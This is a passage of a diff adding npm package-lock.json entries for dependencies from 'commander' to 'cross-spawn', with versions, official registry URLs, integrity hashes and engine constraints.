"sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", + "dependencies": { + "delayed-stream": "~1.0.0" + }, + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/commander": { + "version": "4.1.1", + "resolved": "https://registry.npmjs.org/commander/-/commander-4.1.1.tgz", + "integrity": "sha512-NOKm8xhkzAjzFx8B2v5OAHT+u5pRQc2UCa2Vq9jYL/31o2wi9mxBA7LIFs3sV5VSC49z6pEhfbMULvShKj26WA==", + "engines": { + "node": ">= 6" + } + }, + "node_modules/common-path-prefix": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/common-path-prefix/-/common-path-prefix-3.0.0.tgz", + "integrity": "sha512-QE33hToZseCH3jS0qN96O/bSh3kaw/h+Tq7ngyY9eWDUnTlTNUyqfqvCXioLe5Na5jFsL78ra/wuBU4iuEgd4w==", + "dev": true + }, + "node_modules/common-tags": { + "version": "1.8.2", + "resolved": "https://registry.npmjs.org/common-tags/-/common-tags-1.8.2.tgz", + "integrity": "sha512-gk/Z852D2Wtb//0I+kRFNKKE9dIIVirjoqPoA1wJU+XePVXZfGeBpk45+A1rKO4Q43prqWBNY/MiIeRLbPWUaA==", + "dev": true, + "engines": { + "node": ">=4.0.0" + } + }, + "node_modules/commondir": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/commondir/-/commondir-1.0.1.tgz", + "integrity": "sha1-3dgA2gxmEnOTzKWVDqloo6rxJTs=", + "dev": true + }, + "node_modules/component-emitter": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/component-emitter/-/component-emitter-1.3.0.tgz", + "integrity": "sha512-Rd3se6QB+sO1TwqZjscQrurpEPIfO0/yYnSin6Q/rD3mOutHvUrCAhJub3r90uNb+SESBuE0QYoB90YdfatsRg==" + }, + 
"node_modules/compress-commons": { + "version": "4.1.1", + "resolved": "https://registry.npmjs.org/compress-commons/-/compress-commons-4.1.1.tgz", + "integrity": "sha512-QLdDLCKNV2dtoTorqgxngQCMA+gWXkM/Nwu7FpeBhk/RdkzimqC3jueb/FDmaZeXh+uby1jkBqE3xArsLBE5wQ==", + "dependencies": { + "buffer-crc32": "^0.2.13", + "crc32-stream": "^4.0.2", + "normalize-path": "^3.0.0", + "readable-stream": "^3.6.0" + }, + "engines": { + "node": ">= 10" + } + }, + "node_modules/compress-commons/node_modules/crc32-stream": { + "version": "4.0.2", + "resolved": "https://registry.npmjs.org/crc32-stream/-/crc32-stream-4.0.2.tgz", + "integrity": "sha512-DxFZ/Hk473b/muq1VJ///PMNLj0ZMnzye9thBpmjpJKCc5eMgB95aK8zCGrGfQ90cWo561Te6HK9D+j4KPdM6w==", + "dependencies": { + "crc-32": "^1.2.0", + "readable-stream": "^3.4.0" + }, + "engines": { + "node": ">= 10" + } + }, + "node_modules/compressible": { + "version": "2.0.18", + "resolved": "https://registry.npmjs.org/compressible/-/compressible-2.0.18.tgz", + "integrity": "sha512-AF3r7P5dWxL8MxyITRMlORQNaOA2IkAFaTr4k7BUumjPtRpGDTZpl0Pb1XCO6JeDCBdp126Cgs9sMxqSjgYyRg==", + "dependencies": { + "mime-db": ">= 1.43.0 < 2" + }, + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/compression": { + "version": "1.7.4", + "resolved": "https://registry.npmjs.org/compression/-/compression-1.7.4.tgz", + "integrity": "sha512-jaSIDzP9pZVS4ZfQ+TzvtiWhdpFhE2RDHz8QJkpX9SIpLq88VueF5jJw6t+6CUQcAoA6t+x89MLrWAqpfDE8iQ==", + "dependencies": { + "accepts": "~1.3.5", + "bytes": "3.0.0", + "compressible": "~2.0.16", + "debug": "2.6.9", + "on-headers": "~1.0.2", + "safe-buffer": "5.1.2", + "vary": "~1.1.2" + }, + "engines": { + "node": ">= 0.8.0" + } + }, + "node_modules/compression/node_modules/bytes": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/bytes/-/bytes-3.0.0.tgz", + "integrity": "sha1-0ygVQE1olpn4Wk6k+odV3ROpYEg=", + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/compression/node_modules/debug": { + "version": "2.6.9", + "resolved": "https://registry.npmjs.org/debug/-/debug-2.6.9.tgz", + "integrity": "sha512-bC7ElrdJaJnPbAP+1EotYvqZsb3ecl5wi6Bfi6BJTUcNowp6cvspg0jXznRTKDjm/E7AdgFBVeAPVMNcKGsHMA==", + "dependencies": { + "ms": "2.0.0" + } + }, + "node_modules/compression/node_modules/ms": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.0.0.tgz", + "integrity": "sha1-VgiurfwAvmwpAd9fmGF4jeDVl8g=" + }, + "node_modules/compute-scroll-into-view": { + "version": "1.0.17", + "resolved": "https://registry.npmjs.org/compute-scroll-into-view/-/compute-scroll-into-view-1.0.17.tgz", + "integrity": "sha512-j4dx+Fb0URmzbwwMUrhqWM2BEWHdFGx+qZ9qqASHRPqvTYdqvWnHg0H1hIbcyLnvgnoNAVMlwkepyqM3DaIFUg==", + "dev": true + }, + "node_modules/concat-map": { + "version": "0.0.1", + "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", + "integrity": "sha1-2Klr13/Wjfd5OnMDajug1UBdR3s=" + }, + "node_modules/concat-stream": { + "version": "1.6.2", + "resolved": "https://registry.npmjs.org/concat-stream/-/concat-stream-1.6.2.tgz", + "integrity": "sha512-27HBghJxjiZtIk3Ycvn/4kbJk/1uZuJFfuPEns6LaEvpvG1f0hTea8lilrouyo9mVc2GWdcEZ8OLoGmSADlrCw==", + "engines": [ + "node >= 0.8" + ], + "dependencies": { + "buffer-from": "^1.0.0", + "inherits": "^2.0.3", + "readable-stream": "^2.2.2", + "typedarray": "^0.0.6" + } + }, + "node_modules/concat-stream/node_modules/isarray": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/isarray/-/isarray-1.0.0.tgz", + "integrity": 
"sha512-VLghIWNM6ELQzo7zwmcg0NmTVyWKYjvIeM83yjp0wRDTmUnrM678fQbcKBo6n2CJEF0szoG//ytg+TKla89ALQ==" + }, + "node_modules/concat-stream/node_modules/readable-stream": { + "version": "2.3.8", + "resolved": "https://registry.npmjs.org/readable-stream/-/readable-stream-2.3.8.tgz", + "integrity": "sha512-8p0AUk4XODgIewSi0l8Epjs+EVnWiK7NoDIEGU0HhE7+ZyY8D1IMY7odu5lRrFXGg71L15KG8QrPmum45RTtdA==", + "dependencies": { + "core-util-is": "~1.0.0", + "inherits": "~2.0.3", + "isarray": "~1.0.0", + "process-nextick-args": "~2.0.0", + "safe-buffer": "~5.1.1", + "string_decoder": "~1.1.1", + "util-deprecate": "~1.0.1" + } + }, + "node_modules/concat-stream/node_modules/string_decoder": { + "version": "1.1.1", + "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.1.1.tgz", + "integrity": "sha512-n/ShnvDi6FHbbVfviro+WojiFzv+s8MPMHBczVePfUpDJLwoLT0ht1l4YwBCbi8pJAveEEdnkHyPyTP/mzRfwg==", + "dependencies": { + "safe-buffer": "~5.1.0" + } + }, + "node_modules/confbox": { + "version": "0.1.8", + "resolved": "https://registry.npmjs.org/confbox/-/confbox-0.1.8.tgz", + "integrity": "sha512-RMtmw0iFkeR4YV+fUOSucriAQNb9g8zFR52MWCtl+cCZOFRNL6zeB395vPzFhEjjn4fMxXudmELnl/KF/WrK6w==", + "dev": true, + "license": "MIT" + }, + "node_modules/config": { + "version": "1.31.0", + "resolved": "https://registry.npmjs.org/config/-/config-1.31.0.tgz", + "integrity": "sha512-Ep/l9Rd1J9IPueztJfpbOqVzuKHQh4ZODMNt9xqTYdBBNRXbV4oTu34kCkkfdRVcDq0ohtpaeXGgb+c0LQxFRA==", + "dependencies": { + "json5": "^1.0.1" + }, + "engines": { + "node": ">= 4.0.0" + } + }, + "node_modules/config-chain": { + "version": "1.1.13", + "resolved": "https://registry.npmjs.org/config-chain/-/config-chain-1.1.13.tgz", + "integrity": "sha512-qj+f8APARXHrM0hraqXYb2/bOVSV4PvJQlNZ/DVj0QrmNM2q2euizkeuVckQ57J+W0mRH6Hvi+k50M4Jul2VRQ==", + "dev": true, + "dependencies": { + "ini": "^1.3.4", + "proto-list": "~1.2.1" + } + }, + "node_modules/config/node_modules/json5": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/json5/-/json5-1.0.2.tgz", + "integrity": "sha512-g1MWMLBiz8FKi1e4w0UyVL3w+iJceWAFBAaBnnGKOpNa5f8TLktkbre1+s6oICydWAm+HRUGTmI+//xv2hvXYA==", + "dependencies": { + "minimist": "^1.2.0" + }, + "bin": { + "json5": "lib/cli.js" + } + }, + "node_modules/connect-flash": { + "version": "0.1.1", + "resolved": "https://registry.npmjs.org/connect-flash/-/connect-flash-0.1.1.tgz", + "integrity": "sha512-2rcfELQt/ZMP+SM/pG8PyhJRaLKp+6Hk2IUBNkEit09X+vwn3QsAL3ZbYtxUn7NVPzbMTSLRDhqe0B/eh30RYA==", + "engines": { + "node": ">= 0.4.0" + } + }, + "node_modules/connect-history-api-fallback": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/connect-history-api-fallback/-/connect-history-api-fallback-2.0.0.tgz", + "integrity": "sha512-U73+6lQFmfiNPrYbXqr6kZ1i1wiRqXnp2nhMsINseWXO8lDau0LGEffJ8kQi4EjLZympVgRdvqjAgiZ1tgzDDA==", + "dev": true, + "license": "MIT", + "engines": { + "node": ">=0.8" + } + }, + "node_modules/connect-redis": { + "version": "6.1.3", + "resolved": "https://registry.npmjs.org/connect-redis/-/connect-redis-6.1.3.tgz", + "integrity": "sha512-aaNluLlAn/3JPxRwdzw7lhvEoU6Enb+d83xnokUNhC9dktqBoawKWL+WuxinxvBLTz6q9vReTnUDnUslaz74aw==", + "engines": { + "node": ">=12" + } + }, + "node_modules/consola": { + "version": "3.4.0", + "resolved": "https://registry.npmjs.org/consola/-/consola-3.4.0.tgz", + "integrity": "sha512-EiPU8G6dQG0GFHNR8ljnZFki/8a+cQwEQ+7wpxdChl02Q8HXlwEZWD5lqAF8vC2sEC3Tehr8hy7vErz88LHyUA==", + "dev": true, + "license": "MIT", + "engines": { + "node": "^14.18.0 || >=16.10.0" + } + }, + 
"node_modules/console-control-strings": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/console-control-strings/-/console-control-strings-1.1.0.tgz", + "integrity": "sha1-PXz0Rk22RG6mRL9LOVB/mFEAjo4=" + }, + "node_modules/console-log-level": { + "version": "1.4.1", + "resolved": "https://registry.npmjs.org/console-log-level/-/console-log-level-1.4.1.tgz", + "integrity": "sha512-VZzbIORbP+PPcN/gg3DXClTLPLg5Slwd5fL2MIc+o1qZ4BXBvWyc6QxPk6T/Mkr6IVjRpoAGf32XxP3ZWMVRcQ==" + }, + "node_modules/constantinople": { + "version": "4.0.1", + "resolved": "https://registry.npmjs.org/constantinople/-/constantinople-4.0.1.tgz", + "integrity": "sha512-vCrqcSIq4//Gx74TXXCGnHpulY1dskqLTFGDmhrGxzeXL8lF8kvXv6mpNWlJj1uD4DW23D4ljAqbY4RRaaUZIw==", + "dependencies": { + "@babel/parser": "^7.6.0", + "@babel/types": "^7.6.1" + } + }, + "node_modules/constants-browserify": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/constants-browserify/-/constants-browserify-1.0.0.tgz", + "integrity": "sha512-xFxOwqIzR/e1k1gLiWEophSCMqXcwVHIH7akf7b/vxcUeGunlj3hvZaaqxwHsTgn+IndtkQJgSztIDWeumWJDQ==", + "dev": true, + "license": "MIT" + }, + "node_modules/content-disposition": { + "version": "0.5.4", + "resolved": "https://registry.npmjs.org/content-disposition/-/content-disposition-0.5.4.tgz", + "integrity": "sha512-FveZTNuGw04cxlAiWbzi6zTAL/lhehaWbTtgluJh4/E95DqMwTmha3KZN1aAWA8cFIhHzMZUvLevkw5Rqk+tSQ==", + "dependencies": { + "safe-buffer": "5.2.1" + }, + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/content-disposition/node_modules/safe-buffer": { + "version": "5.2.1", + "resolved": "https://registry.npmjs.org/safe-buffer/-/safe-buffer-5.2.1.tgz", + "integrity": "sha512-rp3So07KcdmmKbGvgaNxQSJr7bGVSVk5S9Eq1F+ppbRo70+YeaDxkw5Dd8NPN+GD6bjnYm2VuPuCXmpuYvmCXQ==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ] + }, + "node_modules/content-security-policy-builder": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/content-security-policy-builder/-/content-security-policy-builder-2.1.0.tgz", + "integrity": "sha512-/MtLWhJVvJNkA9dVLAp6fg9LxD2gfI6R2Fi1hPmfjYXSahJJzcfvoeDOxSyp4NvxMuwWv3WMssE9o31DoULHrQ==", + "engines": { + "node": ">=4.0.0" + } + }, + "node_modules/content-type": { + "version": "1.0.5", + "resolved": "https://registry.npmjs.org/content-type/-/content-type-1.0.5.tgz", + "integrity": "sha512-nTjqfcBFEipKdXCv4YDQWCfmcLZKm81ldF0pAopTvyrFGVbcR6P/VAAd5G7N+0tTr8QqiU0tFadD6FK4NtJwOA==", + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/contentful": { + "version": "10.8.5", + "resolved": "https://registry.npmjs.org/contentful/-/contentful-10.8.5.tgz", + "integrity": "sha512-aol2LmjRAmuOKQPITZtNasIkRFIECnrcQf2UiXGBZ2ldUpCAjyr533553fuGst2SeHZoKleLyYqFNgHcznDBUw==", + "dependencies": { + "@contentful/rich-text-types": "^16.0.2", + "axios": "^1.6.7", + "contentful-resolve-response": "^1.8.1", + "contentful-sdk-core": "^8.1.0", + "json-stringify-safe": "^5.0.1", + "type-fest": "^4.0.0" + }, + "engines": { + "node": ">=18" + } + }, + "node_modules/contentful-resolve-response": { + "version": "1.8.1", + "resolved": "https://registry.npmjs.org/contentful-resolve-response/-/contentful-resolve-response-1.8.1.tgz", + "integrity": "sha512-VXGK2c8dBIGcRCknqudKmkDr2PzsUYfjLN6hhx71T09UzoXOdA/c0kfDhsf/BBCBWPWcLaUgaJEFU0lCo45TSg==", + "dependencies": { + "fast-copy": "^2.1.7" + }, + 
"engines": { + "node": ">=4.7.2" + } + }, + "node_modules/contentful-sdk-core": { + "version": "8.1.2", + "resolved": "https://registry.npmjs.org/contentful-sdk-core/-/contentful-sdk-core-8.1.2.tgz", + "integrity": "sha512-XZvX2JMJF4YiICXLrHFv59KBHaQJ6ElqAP8gSNgnCu4x+pPG7Y1bC2JMNOiyAgJuGQGVUOcNZ5PmK+tsNEayYw==", + "dependencies": { + "fast-copy": "^2.1.7", + "lodash.isplainobject": "^4.0.6", + "lodash.isstring": "^4.0.1", + "p-throttle": "^4.1.1", + "qs": "^6.11.2" + }, + "engines": { + "node": ">=12" + } + }, + "node_modules/contentful/node_modules/type-fest": { + "version": "4.13.1", + "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-4.13.1.tgz", + "integrity": "sha512-ASMgM+Vf2cLwDMt1KXSkMUDSYCxtckDJs8zsaVF/mYteIsiARKCVtyXtcK38mIKbLTctZP8v6GMqdNaeI3fo7g==", + "engines": { + "node": ">=16" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/convert-source-map": { + "version": "1.8.0", + "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-1.8.0.tgz", + "integrity": "sha512-+OQdjP49zViI/6i7nIJpA8rAl4sV/JdPfU9nZs3VqOwGIgizICvuN2ru6fMd+4llL0tar18UYJXfZ/TWtmhUjA==", + "dev": true, + "dependencies": { + "safe-buffer": "~5.1.1" + } + }, + "node_modules/cookie": { + "version": "0.2.4", + "resolved": "https://registry.npmjs.org/cookie/-/cookie-0.2.4.tgz", + "integrity": "sha1-qMFVqnubLPLE0y68e5oKoojMxr0=", + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/cookie-parser": { + "version": "1.4.6", + "resolved": "https://registry.npmjs.org/cookie-parser/-/cookie-parser-1.4.6.tgz", + "integrity": "sha512-z3IzaNjdwUC2olLIB5/ITd0/setiaFMLYiZJle7xg5Fe9KWAceil7xszYfHHBtDFYLSgJduS2Ty0P1uJdPDJeA==", + "dependencies": { + "cookie": "0.4.1", + "cookie-signature": "1.0.6" + }, + "engines": { + "node": ">= 0.8.0" + } + }, + "node_modules/cookie-parser/node_modules/cookie": { + "version": "0.4.1", + "resolved": "https://registry.npmjs.org/cookie/-/cookie-0.4.1.tgz", + "integrity": "sha512-ZwrFkGJxUR3EIoXtO+yVE69Eb7KlixbaeAWfBQB9vVsNn/o+Yw69gBWSSDK825hQNdN+wF8zELf3dFNl/kxkUA==", + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/cookie-parser/node_modules/cookie-signature": { + "version": "1.0.6", + "resolved": "https://registry.npmjs.org/cookie-signature/-/cookie-signature-1.0.6.tgz", + "integrity": "sha1-4wOogrNCzD7oylE6eZmXNNqzriw=" + }, + "node_modules/cookie-signature": { + "version": "1.2.1", + "resolved": "https://registry.npmjs.org/cookie-signature/-/cookie-signature-1.2.1.tgz", + "integrity": "sha512-78KWk9T26NhzXtuL26cIJ8/qNHANyJ/ZYrmEXFzUmhZdjpBv+DlWlOANRTGBt48YcyslsLrj0bMLFTmXvLRCOw==", + "dev": true, + "engines": { + "node": ">=6.6.0" + } + }, + "node_modules/cookiejar": { + "version": "2.1.4", + "resolved": "https://registry.npmjs.org/cookiejar/-/cookiejar-2.1.4.tgz", + "integrity": "sha512-LDx6oHrK+PhzLKJU9j5S7/Y3jM/mUHvD/DeI1WQmJn652iPC5Y4TBzC9l+5OMOXlyTTA+SmVUPm0HQUwpD5Jqw==" + }, + "node_modules/copy-anything": { + "version": "2.0.6", + "resolved": "https://registry.npmjs.org/copy-anything/-/copy-anything-2.0.6.tgz", + "integrity": "sha512-1j20GZTsvKNkc4BY3NpMOM8tt///wY3FpIzozTOFO2ffuZcV61nojHXVKIy3WM+7ADCy5FVhdZYHYDdgTU0yJw==", + "dev": true, + "dependencies": { + "is-what": "^3.14.1" + }, + "funding": { + "url": "https://github.com/sponsors/mesqueeb" + } + }, + "node_modules/copy-descriptor": { + "version": "0.1.1", + "resolved": "https://registry.npmjs.org/copy-descriptor/-/copy-descriptor-0.1.1.tgz", + "integrity": 
"sha512-XgZ0pFcakEUlbwQEVNg3+QAis1FyTL3Qel9FYy8pSkQqoG3PNoT0bOCQtOXcOkur21r2Eq2kI+IE+gsmAEVlYw==", + "dev": true, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/copy-webpack-plugin": { + "version": "11.0.0", + "resolved": "https://registry.npmjs.org/copy-webpack-plugin/-/copy-webpack-plugin-11.0.0.tgz", + "integrity": "sha512-fX2MWpamkW0hZxMEg0+mYnA40LTosOSa5TqZ9GYIBzyJa9C3QUaMPSE2xAi/buNr8u89SfD9wHSQVBzrRa/SOQ==", + "dev": true, + "dependencies": { + "fast-glob": "^3.2.11", + "glob-parent": "^6.0.1", + "globby": "^13.1.1", + "normalize-path": "^3.0.0", + "schema-utils": "^4.0.0", + "serialize-javascript": "^6.0.0" + }, + "engines": { + "node": ">= 14.15.0" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/webpack" + }, + "peerDependencies": { + "webpack": "^5.1.0" + } + }, + "node_modules/copy-webpack-plugin/node_modules/ajv": { + "version": "8.12.0", + "resolved": "https://registry.npmjs.org/ajv/-/ajv-8.12.0.tgz", + "integrity": "sha512-sRu1kpcO9yLtYxBKvqfTeh9KzZEwO3STyX1HT+4CaDzC6HpTGYhIhPIzj9XuKU7KYDwnaeh5hcOwjy1QuJzBPA==", + "dev": true, + "dependencies": { + "fast-deep-equal": "^3.1.1", + "json-schema-traverse": "^1.0.0", + "require-from-string": "^2.0.2", + "uri-js": "^4.2.2" + }, + "funding": { + "type": "github", + "url": "https://github.com/sponsors/epoberezkin" + } + }, + "node_modules/copy-webpack-plugin/node_modules/ajv-keywords": { + "version": "5.1.0", + "resolved": "https://registry.npmjs.org/ajv-keywords/-/ajv-keywords-5.1.0.tgz", + "integrity": "sha512-YCS/JNFAUyr5vAuhk1DWm1CBxRHW9LbJ2ozWeemrIqpbsqKjHVxYPyi5GC0rjZIT5JxJ3virVTS8wk4i/Z+krw==", + "dev": true, + "dependencies": { + "fast-deep-equal": "^3.1.3" + }, + "peerDependencies": { + "ajv": "^8.8.2" + } + }, + "node_modules/copy-webpack-plugin/node_modules/glob-parent": { + "version": "6.0.2", + "resolved": "https://registry.npmjs.org/glob-parent/-/glob-parent-6.0.2.tgz", + "integrity": "sha512-XxwI8EOhVQgWp6iDL+3b0r86f4d6AX6zSU55HfB4ydCEuXLXc5FcYeOu+nnGftS4TEju/11rt4KJPTMgbfmv4A==", + "dev": true, + "dependencies": { + "is-glob": "^4.0.3" + }, + "engines": { + "node": ">=10.13.0" + } + }, + "node_modules/copy-webpack-plugin/node_modules/globby": { + "version": "13.1.4", + "resolved": "https://registry.npmjs.org/globby/-/globby-13.1.4.tgz", + "integrity": "sha512-iui/IiiW+QrJ1X1hKH5qwlMQyv34wJAYwH1vrf8b9kBA4sNiif3gKsMHa+BrdnOpEudWjpotfa7LrTzB1ERS/g==", + "dev": true, + "dependencies": { + "dir-glob": "^3.0.1", + "fast-glob": "^3.2.11", + "ignore": "^5.2.0", + "merge2": "^1.4.1", + "slash": "^4.0.0" + }, + "engines": { + "node": "^12.20.0 || ^14.13.1 || >=16.0.0" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/copy-webpack-plugin/node_modules/json-schema-traverse": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/json-schema-traverse/-/json-schema-traverse-1.0.0.tgz", + "integrity": "sha512-NM8/P9n3XjXhIZn1lLhkFaACTOURQXjWhV4BA/RnOv8xvgqtqpAX9IO4mRQxSx1Rlo4tqzeqb0sOlruaOy3dug==", + "dev": true + }, + "node_modules/copy-webpack-plugin/node_modules/schema-utils": { + "version": "4.0.1", + "resolved": "https://registry.npmjs.org/schema-utils/-/schema-utils-4.0.1.tgz", + "integrity": "sha512-lELhBAAly9NowEsX0yZBlw9ahZG+sK/1RJ21EpzdYHKEs13Vku3LJ+MIPhh4sMs0oCCeufZQEQbMekiA4vuVIQ==", + "dev": true, + "dependencies": { + "@types/json-schema": "^7.0.9", + "ajv": "^8.9.0", + "ajv-formats": "^2.1.1", + "ajv-keywords": "^5.1.0" + }, + "engines": { + "node": ">= 12.13.0" + }, + "funding": { + "type": "opencollective", + 
"url": "https://opencollective.com/webpack" + } + }, + "node_modules/copy-webpack-plugin/node_modules/slash": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/slash/-/slash-4.0.0.tgz", + "integrity": "sha512-3dOsAHXXUkQTpOYcoAxLIorMTp4gIQr5IW3iVb7A7lFIp0VHhnynm9izx6TssdrIcVIESAlVjtnO2K8bg+Coew==", + "dev": true, + "engines": { + "node": ">=12" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/core-js": { + "version": "3.38.1", + "resolved": "https://registry.npmjs.org/core-js/-/core-js-3.38.1.tgz", + "integrity": "sha512-OP35aUorbU3Zvlx7pjsFdu1rGNnD4pgw/CWoYzRY3t2EzoVT7shKHY1dlAy3f41cGIO7ZDPQimhGFTlEYkG/Hw==", + "dev": true, + "hasInstallScript": true, + "license": "MIT", + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/core-js" + } + }, + "node_modules/core-js-compat": { + "version": "3.38.1", + "resolved": "https://registry.npmjs.org/core-js-compat/-/core-js-compat-3.38.1.tgz", + "integrity": "sha512-JRH6gfXxGmrzF3tZ57lFx97YARxCXPaMzPo6jELZhv88pBH5VXpQ+y0znKGlFnzuaihqhLbefxSJxWJMPtfDzw==", + "dev": true, + "dependencies": { + "browserslist": "^4.23.3" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/core-js" + } + }, + "node_modules/core-js-pure": { + "version": "3.30.2", + "resolved": "https://registry.npmjs.org/core-js-pure/-/core-js-pure-3.30.2.tgz", + "integrity": "sha512-p/npFUJXXBkCCTIlEGBdghofn00jWG6ZOtdoIXSJmAu2QBvN0IqpZXWweOytcwE6cfx8ZvVUy1vw8zxhe4Y2vg==", + "hasInstallScript": true, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/core-js" + } + }, + "node_modules/core-util-is": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", + "integrity": "sha1-tf1UIgqivFq1eqtxQMlAdUUDwac=" + }, + "node_modules/cors": { + "version": "2.8.5", + "resolved": "https://registry.npmjs.org/cors/-/cors-2.8.5.tgz", + "integrity": "sha512-KIHbLJqu73RGr/hnbrO9uBeixNGuvSQjul/jdFvS/KFSIH1hWVd1ng7zOHx+YrEfInLG7q4n6GHQ9cDtxv/P6g==", + "dev": true, + "dependencies": { + "object-assign": "^4", + "vary": "^1" + }, + "engines": { + "node": ">= 0.10" + } + }, + "node_modules/cosmiconfig": { + "version": "7.0.1", + "resolved": "https://registry.npmjs.org/cosmiconfig/-/cosmiconfig-7.0.1.tgz", + "integrity": "sha512-a1YWNUV2HwGimB7dU2s1wUMurNKjpx60HxBB6xUM8Re+2s1g1IIfJvFR0/iCF+XHdE0GMTKTuLR32UQff4TEyQ==", + "dev": true, + "dependencies": { + "@types/parse-json": "^4.0.0", + "import-fresh": "^3.2.1", + "parse-json": "^5.0.0", + "path-type": "^4.0.0", + "yaml": "^1.10.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/crc-32": { + "version": "1.2.2", + "resolved": "https://registry.npmjs.org/crc-32/-/crc-32-1.2.2.tgz", + "integrity": "sha512-ROmzCKrTnOwybPcJApAA6WBWij23HVfGVNKqqrZpuyZOHqK2CwHSvpGuyt/UNNvaIjEd8X5IFGp4Mh+Ie1IHJQ==", + "bin": { + "crc32": "bin/crc32.njs" + }, + "engines": { + "node": ">=0.8" + } + }, + "node_modules/create-storybook": { + "version": "8.6.4", + "resolved": "https://registry.npmjs.org/create-storybook/-/create-storybook-8.6.4.tgz", + "integrity": "sha512-YwxtA+CtGHWYvQrFh1dat3Q/kXWHekok0MAqaorD9/Mf/cpybA8afHDsdq2PDq0LXg0Od3QI4Ha04+eaB6F8gA==", + "dev": true, + "license": "MIT", + "dependencies": { + "recast": "^0.23.5", + "semver": "^7.6.2" + }, + "bin": { + "create-storybook": "bin/index.cjs" + }, + "funding": { + "type": "opencollective", + "url": "https://opencollective.com/storybook" + } + }, + "node_modules/create-storybook/node_modules/semver": { + 
"version": "7.7.1", + "resolved": "https://registry.npmjs.org/semver/-/semver-7.7.1.tgz", + "integrity": "sha512-hlq8tAfn0m/61p4BVRcPzIGr6LKiMwo4VM6dGi6pt4qcRkmNzTcWq6eCEjEh+qXjkMDvPlOFFSGwQjoEa6gyMA==", + "dev": true, + "license": "ISC", + "bin": { + "semver": "bin/semver.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/crelt": { + "version": "1.0.5", + "resolved": "https://registry.npmjs.org/crelt/-/crelt-1.0.5.tgz", + "integrity": "sha512-+BO9wPPi+DWTDcNYhr/W90myha8ptzftZT+LwcmUbbok0rcP/fequmFYCw8NMoH7pkAZQzU78b3kYrlua5a9eA==", + "dev": true + }, + "node_modules/cron": { + "version": "1.8.2", + "resolved": "https://registry.npmjs.org/cron/-/cron-1.8.2.tgz", + "integrity": "sha512-Gk2c4y6xKEO8FSAUTklqtfSr7oTq0CiPQeLBG5Fl0qoXpZyMcj1SG59YL+hqq04bu6/IuEA7lMkYDAplQNKkyg==", + "dependencies": { + "moment-timezone": "^0.5.x" + } + }, + "node_modules/cron-parser": { + "version": "2.18.0", + "resolved": "https://registry.npmjs.org/cron-parser/-/cron-parser-2.18.0.tgz", + "integrity": "sha512-s4odpheTyydAbTBQepsqd2rNWGa2iV3cyo8g7zbI2QQYGLVsfbhmwukayS1XHppe02Oy1fg7mg6xoaraVJeEcg==", + "dependencies": { + "is-nan": "^1.3.0", + "moment-timezone": "^0.5.31" + }, + "engines": { + "node": ">=0.8" + } + }, + "node_modules/cross-env": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/cross-env/-/cross-env-4.0.0.tgz", + "integrity": "sha512-dofkcyPqOy/AR14nbYSpk+TZ4IJZqg2as+/mQNkzh+7Xba2I1I1eyg/1G2dtSpD2LHjcEWwnGquiH2OP5LoeOw==", + "license": "MIT", + "dependencies": { + "cross-spawn": "^5.1.0", + "is-windows": "^1.0.0" + }, + "bin": { + "cross-env": "dist/bin/cross-env.js" + }, + "engines": { + "node": ">=4.0" + } + }, + "node_modules/cross-fetch": { + "version": "3.1.8", + "resolved": "https://registry.npmjs.org/cross-fetch/-/cross-fetch-3.1.8.tgz", + "integrity": "sha512-cvA+JwZoU0Xq+h6WkMvAUqPEYy92Obet6UdKLfW60qn99ftItKjB5T+BkyWOFWe2pUyfQ+IJHmpOTznqk1M6Kg==", + "dependencies": { + "node-fetch": "^2.6.12" + } + }, + "node_modules/cross-spawn": { + "version": "7.0.6", + "resolved": "https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.6.tgz", + "integrity": "sha512-uV2QOWP2nWzsy2aMp8aRibhi9dlzF5Hgh5SHaB9OiTGEyDTiJJyx0uy51QXdyWbtAHNua4XJzUKca3OzKUd3vA==", + "license": "MIT", + "dependencies": { + "path-key": "^3.1.0", + "shebang-command": "^2.0.0", + "which": "^2.0.1" + }, + "engines": { + "node": ">= 8" + } + }, 